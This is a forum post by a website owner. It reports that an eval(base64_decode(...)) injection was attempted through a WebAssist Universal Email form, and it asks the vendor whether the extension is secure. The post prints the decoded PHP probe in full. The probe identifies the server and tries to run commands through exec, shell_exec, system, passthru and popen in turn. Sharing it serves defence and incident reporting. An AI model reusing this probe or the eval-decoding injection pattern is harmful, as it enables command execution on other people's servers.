Security in UE - eval(base64_decode(( Hack
Got a number of emails from one of my UE (latest version) form submissions using the supplied template blank.php today. They were all subject to an attack where a eval(base64_decode string was sent via form email.
Decoded the malicious code produces this result:
echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
This looks like an attempt to find entry, though I am starting the process of scanning my server for any unauthorized access/uploads.
Question: is Universal Email secure against such Hack attempts?
I usually use a form text field that is positioned off screen via css and IF populated, do not process the form (basic Honeypot screening).
But IF there are other things that we should all be doing to protect our sites, and if there are any security concerns related to the WebAssist extensions, it would be helpful for this to be published.
Any comments from Web Assist staff?